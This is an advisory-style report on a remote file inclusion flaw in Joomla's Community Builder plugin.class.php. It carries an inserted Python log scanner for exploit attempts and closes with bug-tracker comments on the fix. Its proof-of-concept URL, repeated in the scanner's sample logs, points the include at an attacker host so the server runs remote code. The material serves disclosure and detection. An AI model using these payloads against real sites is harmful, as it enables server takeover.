Vulnerability:
~~~~~~~~~~~~~~~
In folder com_comprofiler we found a vulnerable script, plugin.class.php

-----------------------plugin.class.php----------------------
<?php
/**
 * Plugin handler
 * @package Joomla
 * @author various, JoomlaJoe and Beat
 */
require_once( $mosConfig_absolute_path . '/includes/domit/xml_domit_lite_include.php' );
----------------------------------------------------------

The variable $mosConfig_absolute_path is not properly sanitized.

Proof Of Concept:
~~~~~~~~~~~~~~~~
http://[target]/[path]/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://attacker.com/evil.txt?

Solution:
~~~~~~~~
Sanitize the variable $mosConfig_absolute_path in plugin.class.php
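A log check for the request pattern in the proof of concept above, added here as an example and not part of the bug report or of Community Builder/Joomla: it parses constructed Apache combined-log lines and flags requests that override mosConfig_absolute_path with a remote URL, which is what turns the require_once() into a remote file inclusion when register_globals is on. The client addresses, hostnames and log lines are constructed.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample Apache combined-log lines (not taken from the bug report).
SAMPLE_LOG = r'''
203.0.113.7 - - [10/Aug/2006:12:00:01 +0000] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://attacker.example/evil.txt? HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Aug/2006:12:00:02 +0000] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=HTTP%3A%2F%2Fattacker.example%2Fevil.txt%3F HTTP/1.1" 200 512 "-" "curl/7.15"
198.51.100.4 - - [10/Aug/2006:12:00:03 +0000] "GET /index.php?option=com_comprofiler&task=userProfile HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Aug/2006:12:00:04 +0000] "GET /index.php?mosConfig_absolute_path=/var/www/html HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
'''.strip()

# Client address and request target from a combined-log entry.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*"'
)
# Values that make require_once() fetch a remote file when allow_url_fopen is on.
REMOTE_SCHEME_RE = re.compile(r'^\s*(https?|ftps?)://', re.IGNORECASE)
TAINTED_VAR = "mosConfig_absolute_path"


def is_rfi_attempt(target: str) -> bool:
    """True when the query string sets mosConfig_absolute_path to a remote URL."""
    query = urlsplit(target).query
    # keep_blank_values so the PoC's trailing '?' cannot hide the parameter;
    # parse_qs percent-decodes once, the extra unquote() catches double encoding.
    for name, values in parse_qs(query, keep_blank_values=True).items():
        if unquote(name) != TAINTED_VAR:
            continue
        if any(REMOTE_SCHEME_RE.match(unquote(v)) for v in values):
            return True
    return False


def scan_log(text: str) -> list[tuple[str, str]]:
    """Return (client_ip, request_target) for every request that looks like an RFI attempt."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if m and is_rfi_attempt(m.group("target")):
            hits.append((m.group("ip"), m.group("target")))
    return hits


if __name__ == "__main__":
    for ip, target in scan_log(SAMPLE_LOG):
        print(f"RFI attempt from {ip}: {target}")
```

A local path in the parameter (the fourth line) is not flagged; only values that point the include at another host are.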
Bump to Joomla 1.0.11 and future Mambo 4.6 Release is required.
Joomla done. Why are there 3 bugs for the same issue?
Removing Joomla from Summary as it is handled on bug #145481.
-r2 in CVS
Closing without GLSA (~arch). Thanks Renat.